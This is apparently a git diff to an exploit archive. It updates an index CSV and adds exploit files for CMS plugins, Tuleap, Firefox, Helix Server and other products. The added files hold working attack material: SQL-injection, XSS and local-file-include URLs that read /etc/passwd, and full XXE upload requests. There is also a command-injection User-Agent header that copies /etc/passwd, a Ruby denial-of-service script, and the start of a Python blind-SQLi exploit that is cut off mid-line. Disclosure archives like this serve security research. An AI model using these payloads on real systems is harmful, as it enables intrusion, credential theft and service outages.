diff --git a/files.csv b/files.csv index ebf68fa5a..2ccd685d7 100755 --- a/files.csv +++ b/files.csv @@ -31573,7 +31573,7 @@ id,file,description,date,author,platform,type,port 35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server Directory Traversal Vulnerability",2010-12-06,Pr0T3cT10n,windows,remote,0 35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin - Remote File Inclusion (RFI)",2014-10-25,"Parvinder Bhasin",php,webapps,0 35055,platforms/windows/remote/35055.py,"Windows OLE - Remote Code Execution ""Sandworm"" Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0 -35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Remote File Inclusion",2014-10-25,"Mauricio Correa",hardware,webapps,0 +35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"Mauricio Correa",hardware,webapps,0 35057,platforms/php/webapps/35057.py,"Creative Contact Form (Wordpress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0 35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0 35059,platforms/ios/webapps/35059.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-25,Vulnerability-Lab,ios,webapps,0 @@ -31594,9 +31594,29 @@ id,file,description,date,author,platform,type,port 35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 (.wav) - Buffer Overflow",2014-10-27,metacom,windows,local,0 35075,platforms/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities",2014-10-27,LiquidWorm,hardware,webapps,0 35076,platforms/multiple/webapps/35076.py,"HP Operations Agent Remote XSS iFrame Injection",2014-10-27,"Matt Schmidt",multiple,webapps,383 +35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass and Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0 35078,platforms/unix/remote/35078.rb,"Centreon SQL and Command Injection",2014-10-27,metasploit,unix,remote,80 35079,platforms/jsp/webapps/35079.txt,"Mulesoft ESB Runtime 3.5.1 - Privilege Escalation Vulnerability",2014-10-27,"Brandon Perry",jsp,webapps,8585 35080,platforms/php/webapps/35080.pl,"Incredible PBX 2.0.6.5.0 - Remote Command Execution",2014-10-27,"Simo Ben Youssef",php,webapps,80 35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0 35082,platforms/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,1861 35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent XSS Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,0 +35084,platforms/php/webapps/35084.txt,"WordPress Twitter Feed Plugin 'url' Parameter Cross Site Scripting Vulnerability",2010-12-07,"John Leitch",php,webapps,0 +35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro 'showflat.pl' Cross Site Scripting Vulnerability",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0 +35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 UPnP HTTP Request Remote Denial of Service Vulnerability.",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0 +35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 (stable) 'admin1.template.php' Local and Remote File Include Vulnerabilities",2010-12-09,"Marcin Ressel",php,webapps,0 +35088,platforms/php/webapps/35088.txt,"PHP State 'id' Parameter SQL Injection Vulnerability",2010-12-09,jos_ali_joe,php,webapps,0 +35089,platforms/php/webapps/35089.txt,"Joomla Jeformcr 'id' Parameter SQL Injection Vulnerability",2010-12-09,FL0RiX,php,webapps,0 +35090,platforms/php/webapps/35090.txt,"JExtensions Property Finder Component for Joomla! 'sf_id' Parameter SQL Injection Vulnerability",2010-12-10,FL0RiX,php,webapps,0 +35091,platforms/php/webapps/35091.txt,"ManageEngine EventLog Analyzer 6.1 Multiple Cross Site Scripting Vulnerabilities",2010-12-10,"Rob Kraus",php,webapps,0 +35092,platforms/multiple/remote/35092.html,"Helix Server 14.0.1.571 Administration Interface Cross Site Request Forgery Vulnerability",2010-12-10,"John Leitch",multiple,remote,0 +35093,platforms/cgi/webapps/35093.txt,"BizDir v.05.10 'f_srch' Parameter Cross Site Scripting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps,0 +35094,platforms/php/webapps/35094.txt,"slickMsg 0.7-alpha 'top.php' Cross Site Scripting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0 +35095,platforms/linux/remote/35095.txt,"Mozilla Firefox/Thunderbird/SeaMonkey Multiple HTML Injection Vulnerabilities",2010-12-09,"Yosuke Hasegawa",linux,remote,0 +35096,platforms/php/webapps/35096.txt,"Joomla! 'com_mailto' Component Multiple Cross Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0 +35097,platforms/php/webapps/35097.txt,"Joomla Redirect Component 1.5.19 'com_redirect' Local File Include Vulnerability",2010-12-13,jos_ali_joe,php,webapps,0 +35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80 +35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80 +35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80 +35101,platforms/windows/local/35101.rb,"Windows TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,metasploit,windows,local,0 +35102,platforms/php/webapps/35102.py,"vBulletin Tapatalk - Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80 diff --git a/platforms/cgi/webapps/35085.txt b/platforms/cgi/webapps/35085.txt new file mode 100755 index 000000000..21d8854af --- /dev/null +++ b/platforms/cgi/webapps/35085.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45303/info + +WWWThread is prone to a cross-site-scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +WWWThread 5.0.8 Pro is vulnerable; other versions may also be affected. + +http://www.example.com/cgi-bin/forum/showflat.pl?Cat=&Board=forum&Number=111&page=0&view="expanded&sb=1&part=all&vc=1 \ No newline at end of file diff --git a/platforms/cgi/webapps/35093.txt b/platforms/cgi/webapps/35093.txt new file mode 100755 index 000000000..707ae84ef --- /dev/null +++ b/platforms/cgi/webapps/35093.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45342/info + +BizDir is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +BizDir v.05.10 is vulnerable; other versions may also be affected. + +http://www.example.com/cgi-bin/bizdir/bizdir.cgi?f_mode=srch& f_srch=&f_srch_mode=SOME&f_start_at=1 \ No newline at end of file diff --git a/platforms/linux/remote/35095.txt b/platforms/linux/remote/35095.txt new file mode 100755 index 000000000..4c2b7a2da --- /dev/null +++ b/platforms/linux/remote/35095.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/45353/info + +Mozilla Firefox, SeaMonkey, and Thunderbird are prone to multiple HTML-injection vulnerabilities. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +This issue is fixed in: + +Firefox 3.6.13 +Firefox 3.5.16 +SeaMonkey 2.0.11 + +x-mac-farsi exploit: ?script ?alert(1)//?/script ? \ No newline at end of file diff --git a/platforms/multiple/dos/35086.rb b/platforms/multiple/dos/35086.rb new file mode 100755 index 000000000..ece4fc382 --- /dev/null +++ b/platforms/multiple/dos/35086.rb @@ -0,0 +1,24 @@ +source: http://www.securityfocus.com/bid/45309/info + +Allegro RomPager is prone to a remote denial-of-service vulnerability. + +Successfully exploiting this issue allows remote attackers to reboot affected devices, resulting in a denial-of-service condition. + +require 'net/https' + +url = URI.parse("http://IP/") +data = nil +headers = { + "Host" => "IP", + "Authorization" => "Basic + +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +} + +res = Net::HTTP.start(url.host, url.port) do |http| + http.use_ssl = false + http.send_request("GET", url.path, data, headers) +end + +puts res.body + diff --git a/platforms/multiple/remote/35092.html b/platforms/multiple/remote/35092.html new file mode 100755 index 000000000..5547d6d32 --- /dev/null +++ b/platforms/multiple/remote/35092.html @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/45340/info + +Helix Server is prone to a cross-site request-forgery vulnerability. + +An attacker can exploit this issue to perform unauthorized actions by enticing a logged-in user to visit a malicious site. + +Helix Server 14.0.1.571 is vulnerable; other versions may also be affected. + + + + + + \ No newline at end of file diff --git a/platforms/php/webapps/35084.txt b/platforms/php/webapps/35084.txt new file mode 100755 index 000000000..b7dc2e681 --- /dev/null +++ b/platforms/php/webapps/35084.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45294/info + +The Twitter Feed Plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Twitter Feed 0.3.1 is vulnerable; other versions may also be affected. + +http://www.example.com/wordpress/wp-content/plugins/wp-twitter-feed/magpie/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35087.txt b/platforms/php/webapps/35087.txt new file mode 100755 index 000000000..0d044894f --- /dev/null +++ b/platforms/php/webapps/35087.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45312/info + +The 'net2ftp' program is prone to a local file-include vulnerability and a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input. + +An attacker can exploit these issues to obtain sensitive information; other attacks are also possible. + +net2ftp 0.98 stable is vulnerable; other versions may also be affected. + +http://www.example.com/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=evilevilevil \ No newline at end of file diff --git a/platforms/php/webapps/35088.txt b/platforms/php/webapps/35088.txt new file mode 100755 index 000000000..ad78777a0 --- /dev/null +++ b/platforms/php/webapps/35088.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/45328/info + +PHP State is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +http://www.example.com/state.php?id=37+union+select+1,2,3,4,5,6,7,concat_ws (0x3a,user(),database(),versi(),@version_compile_os),8,9,10,11- josalijoe - \ No newline at end of file diff --git a/platforms/php/webapps/35089.txt b/platforms/php/webapps/35089.txt new file mode 100755 index 000000000..7a3393946 --- /dev/null +++ b/platforms/php/webapps/35089.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/45329/info + +Joomla Jeformcr is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_jeformcr&view=form&id=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/35090.txt b/platforms/php/webapps/35090.txt new file mode 100755 index 000000000..3f461b86d --- /dev/null +++ b/platforms/php/webapps/35090.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/45333/info + +JExtensions Property Finder is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_jesectionfinder&view=sectiondetail&sf_id=[EXPLOIT] \ No newline at end of file diff --git a/platforms/php/webapps/35091.txt b/platforms/php/webapps/35091.txt new file mode 100755 index 000000000..95da59d90 --- /dev/null +++ b/platforms/php/webapps/35091.txt @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/45334/info + +ManageEngine EventLog Analyzer is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +ManageEngine EventLog Analyzer 6.1 is vulnerable; other versions may also be affected. + +https://www.example.com/pkg_edit.php?xml=olsrd.xml&id=%22/%3E%3Cscript%3Ealert%282%29;%3C/script%3E + + +https://www.example.com/pkg.php?xml=jailctl.xm%27l%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E + + +https://www.example.com/status_graph.php?if=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E + + +https://www.example.com/interfaces.php?if=wan%22%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35094.txt b/platforms/php/webapps/35094.txt new file mode 100755 index 000000000..5819c9ac1 --- /dev/null +++ b/platforms/php/webapps/35094.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45343/info + +slickMsg is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +slickMsg 0.7-alpha is vulnerable; other versions may also be affected. + +http://www.example.com/slickmsg/views/Thread/display/top.php?title=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35096.txt b/platforms/php/webapps/35096.txt new file mode 100755 index 000000000..8a4b9550b --- /dev/null +++ b/platforms/php/webapps/35096.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/45356/info + +The 'com_mailto' component for Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +" style="xss:expression(alert(document.cookie)) +In fields: E-mail to, Sender, Your E-mail, Subject. \ No newline at end of file diff --git a/platforms/php/webapps/35097.txt b/platforms/php/webapps/35097.txt new file mode 100755 index 000000000..c8c21505d --- /dev/null +++ b/platforms/php/webapps/35097.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45364/info + +The 'com_redirect' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. + +Joomla Redirect 1.5.19 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?option=com_redirect&view=../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/35098.txt b/platforms/php/webapps/35098.txt new file mode 100755 index 000000000..f0054ce93 --- /dev/null +++ b/platforms/php/webapps/35098.txt @@ -0,0 +1,36 @@ +Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap +CVE: CVE-2014-7176 +Vendor: Enalean +Product: Tuleap +Affected version: 7.4.99.5 and earlier +Fixed version: 7.5 +Reported by: Jerzy Kramarz + +Details: + +SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injections: + + +GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a&global_filtersubmit=Apply HTTP/1.1 +Host: 192.168.56.108 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://192.168.56.108/plugins/docman/?group_id=100 +Cookie: PHPSESSID=3pt0ombsmp0t9adujgrohv8mb6; TULEAP_session_hash=d51433e1f7c9b49079c0e5c511d64c96 +Connection: keep-alive + + +Note: In order to exploit this vulnerability a attacker needs to be in position to access '/plugins/docman/' URN. + + +Further details at: + +https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7176/ + +Copyright: +Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. + +Disclaimer: +The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. diff --git a/platforms/php/webapps/35099.txt b/platforms/php/webapps/35099.txt new file mode 100755 index 000000000..72d79cbf3 --- /dev/null +++ b/platforms/php/webapps/35099.txt @@ -0,0 +1,888 @@ +Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap +CVE: CVE-2014-7177 +Vendor: Enalean +Product: Tuleap +Affected version: 7.2 and earlier +Fixed version: 7.4.99.5 +Reported by: Jerzy Kramarz + +Details: + +A multiple XML External Entity Injection has been found and confirmed within the software as an authenticated user. Successful attack could allow an authenticated attacker to access local system files. The following example vectors can be used as PoC to confirm the vulnerability. + +Vulnerability 1: + +1) Upload a XXE using the following request: + + +POST /plugins/tracker/?group_id=102&func=create HTTP/1.1 +Host: [ip] +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://[ip]/plugins/tracker/?group_id=102&func=create +Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=4a8075ce16e338b4015405cfa2816319 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------25777276834778 +Content-Length: 10561 + +-----------------------------25777276834778 +Content-Disposition: form-data; name="group_id" + +102 +-----------------------------25777276834778 +Content-Disposition: form-data; name="func" + +docreate +-----------------------------25777276834778 +Content-Disposition: form-data; name="group_id_template" + +100 +-----------------------------25777276834778 +Content-Disposition: form-data; name="tracker_new_prjname" + +Commencez à taper +-----------------------------25777276834778 +Content-Disposition: form-data; name="create_mode" + +xml +-----------------------------25777276834778 +Content-Disposition: form-data; name="tracker_new_xml_file"; filename="xee.xml" +Content-Type: text/xml + + +]> + + 123&xxe; + e123&xxe; + 123&xxe; + + + + attachment + + + + details + + A full description of the artifact&xxe; + + + + summary + + One line description of the artifact&xxe; + + + + cc + + + + + + status_id + + Artifact Status + + + + The artifact has been submitted&xxe; + + + The artifact is no longer active. See the Resolution field for details on how it was resolved.&xxe; + + + + + + assigned_to + + Who is in charge of solving the artifact&xxe; + + + + + + + + category_id + + Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...) + + + + severity + + How quickly the artifact must be completed + + + + + + + + + + + + + + + + + + + + + + + + + + + stage&xxe; + + Stage in the life cycle of the artifact&xxe; + + + + The artifact has just been submitted + + + The cause of the artifact has been identified and documented + + + The artifact will be worked on. + + + The artifact is being worked on. + + + Updated/Created non-software work product (e.g. documentation) is ready for review and approval. + + + Updated/Created software is ready to be included in the next build + + + Updated/Created software is in the build and is ready to enter the test phase + + + The artifact fix has been succesfully tested. It is approved and awaiting release. + + + The artifact was not accepted. + + + The artifact is closed. + + + + + + + + + + + Default + The system default artifact report + + + + Results + + + + Default + Graphic Report By Default For Support Requests + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +-----------------------------25777276834778 +Content-Disposition: form-data; name="name" + +123 +-----------------------------25777276834778 +Content-Disposition: form-data; name="description" + +123 +-----------------------------25777276834778 +Content-Disposition: form-data; name="itemname" + +e123 +-----------------------------25777276834778 +Content-Disposition: form-data; name="Create" + +Créer +-----------------------------25777276834778-- + + +2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following: + + +https://[ip]/plugins/tracker/?group_id=102&tracker=11 + + +3) Using retrieved tracker number, a XXE can be trigerred by visiting the following URL: + + +https://[ip]/plugins/tracker/?tracker=11&func=admin-formElements + + +Vulnerability 2 + +1) Upload a XXE using the following request: + +< +POST /plugins/tracker/?group_id=102&func=create HTTP/1.1 +Host: [ip] +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://[ip]/plugins/tracker/?group_id=102&func=create +Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=e619b58add92383b3647ee5ba68c4a79 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------12077103611061 +Content-Length: 25588 + +-----------------------------12077103611061 +Content-Disposition: form-data; name="group_id" + +102 +-----------------------------12077103611061 +Content-Disposition: form-data; name="func" + +docreate +-----------------------------12077103611061 +Content-Disposition: form-data; name="group_id_template" + +100 +-----------------------------12077103611061 +Content-Disposition: form-data; name="tracker_new_prjname" + +Commencez à taper +-----------------------------12077103611061 +Content-Disposition: form-data; name="create_mode" + +xml +-----------------------------12077103611061 +Content-Disposition: form-data; name="tracker_new_xml_file"; filename="tracker_bugs.xml" +Content-Type: text/xml + + +]> + + Bugs + bug + Bugs Tracker + + + + column8 + + + + artifact_id + + Unique artifact identifier&xxe; + + + submitted_by + + User who originally submitted the artifact&xxe; + + + + + column10&xxe; + + + + last_update_date + + Date and time of the latest modification in an artifact&xxe; + + + open_date&xxe; + + Date and time for the initial artifact submission&xxe; + + + + + fieldset_1 + + fieldset_default_desc_key + + + summary + + One line description of the artifact + + + + details + + A full description of the artifact + + + + column10 + + + + severity + + Impact of the artifact on the system (Critical, Major,...) + + + + + + + + + + + + + + + + + + + + + + + + + + + + + column10 + + + + category + + Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...) + + + + + + close_date + + End Date + + + + multi_assigned_to + + Who is in charge of this artifact + + + + + + + + + + + fieldset1 + + + + column3 + + + + status_id + + Artifact Status + + + + + + + + + + + + + stage + + Stage in the life cycle of the artifact + + + + The artifact has just been submitted + + + The cause of the artifact has been identified and documented + + + The artifact will be worked on. + + + The artifact is being worked on. + + + Updated/Created non-software work product (e.g. documentation) is ready for review and approval. + + + Updated/Created software is ready to be included in the next build + + + Updated/Created software is in the build and is ready to enter the test phase + + + The artifact fix has been succesfully tested. It is approved and awaiting release. + + + The artifact was not accepted. + + + The artifact is closed. + + + + + + + + column4 + + + + resolution + + The resolution field indicates what happened to the bug. + + + + + + + + + + + + + + + + column9 + + + + assigned_to + + Who is in charge of solving the artifact + + + + + + + + + + + + fieldset1 + + + + attachment + + + + + + fieldset1 + + + + cross_references + + List of items referenced by or referencing this item. + + + references + + + + + + + fieldset1 + + + + permissions_on_artifact + + Let users groups to define who can access an artifact. + + + + + platform + + + + + + + + + + + + + source + + Customer from which the request comes from. + + + + version + + Product version concerned by the bug. + + + + + + title + + Définir le titre d'un artéfact + + + + status + + Définir l'état d'un artifact + + + + + + + + + + + contributor + + Define the contributor/assignee of an artifact + + + + + + + + + + + Bugs + The system default artifact report + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Results + + + + + + + + + + Charts + Graphic Report + + + Status + Number of Artifacts by Status + + + Severity + Number of Artifacts by severity level + + + Assignment + Number of Artifacts by Assignee + + + + + + + Default + The system default artifact report + + + + + + + + + + + + + + + + + + + + Results + + + + + + + + + + + + + + 1 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +-----------------------------12077103611061 +Content-Disposition: form-data; name="name" + +Bugs +-----------------------------12077103611061 +Content-Disposition: form-data; name="description" + +Bugs Tracker +-----------------------------12077103611061 +Content-Disposition: form-data; name="itemname" + +bug +-----------------------------12077103611061 +Content-Disposition: form-data; name="Create" + +Créer +-----------------------------12077103611061-- + + +2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following: + + +https://[ip]/plugins/tracker/?group_id=102&tracker=12 + + +3) Using retrieved tracker number and URL, a XXE can be trigerred by visiting the retrieved URL: + + +https://[ip]/plugins/tracker/?group_id=102&tracker=12 + + +Further details at: + +https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7177/ + +Copyright: +Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. + +Disclaimer: +The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. \ No newline at end of file diff --git a/platforms/php/webapps/35100.txt b/platforms/php/webapps/35100.txt new file mode 100755 index 000000000..4f6b4e6ce --- /dev/null +++ b/platforms/php/webapps/35100.txt @@ -0,0 +1,41 @@ +Vulnerability title: Tuleap <= 7.4.99.5 Remote Command Execution in Enalean Tuleap +CVE: CVE-2014-7178 +Vendor: Enalean +Product: Tuleap +Affected version: 7.4.99.5 and earlier +Fixed version: 7.5 +Reported by: Jerzy Kramarz + +Details: + +Tuleap does not validate the syntax of the requests submitted to SVN handler pages in order to validate weather request passed to passthru() function are introducing any extra parameters that would be executed in the content of the application. + +This vulnerability can be exploited by external attackers to introduce external commands into the workflow of the application that would execute them as shown on the attached Proof Of Concept code below. + +After registering with the application and sending a request similar to the one below the vulnerability can be triggered: + + +GET /svn/viewvc.php/?roottype=svn&root=t11 HTTP/1.1 +Host: [IP] +User-Agent: M" && cat /etc/passwd > /usr/share/codendi/src/www/passwd.txt && "ozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://[IP]/svn/?group_id=102 +Cookie: PHPSESSID=2uqjkd0iupn84gigi4e1tekg95; TULEAP_session_hash=362a9e41d1a93c8f195db4ccc6698ef5 +Connection: keep-alive +Cache-Control: max-age=0 + + +Note: In order to exploit this vulnerability a user needs to be in position to see SVN repository. + + +Further details at: + +https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7178/ + +Copyright: +Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. + +Disclaimer: +The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. \ No newline at end of file diff --git a/platforms/php/webapps/35102.py b/platforms/php/webapps/35102.py new file mode 100755 index 000000000..0df781175 --- /dev/null +++ b/platforms/php/webapps/35102.py @@ -0,0 +1,233 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +''' +@author: tintinweb 0x721427D8 +''' +import urllib2, urllib +import xmlrpclib,re, urllib2,string,itertools,time +from distutils.version import LooseVersion + + +class Exploit(object): + def __init__(self, target, debug=0 ): + self.stopwatch_start=time.time() + self.target = target + self.path = target + self.debug=debug + if not self.target.endswith("mobiquo.php"): + self.path = self.detect_tapatalk() + if not self.path: + raise Exception("Could not detect tapatalk or version not supported!") + self.rpc_connect() + self.attack_func = self.attack_2 + + def detect_tapatalk(self): + # request page, check for tapatalk banner + handlers = [ + urllib2.HTTPHandler(debuglevel=self.debug), + urllib2.HTTPSHandler(debuglevel=self.debug), + + ] + ua = urllib2.build_opener(*handlers) + ua.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3')] + data = ua.open(self.target).read() + if self.debug: + print data + if not "tapatalkDetect()" in data: + print "[xx] could not detect tapatalk. bye..." + return None + + # extract 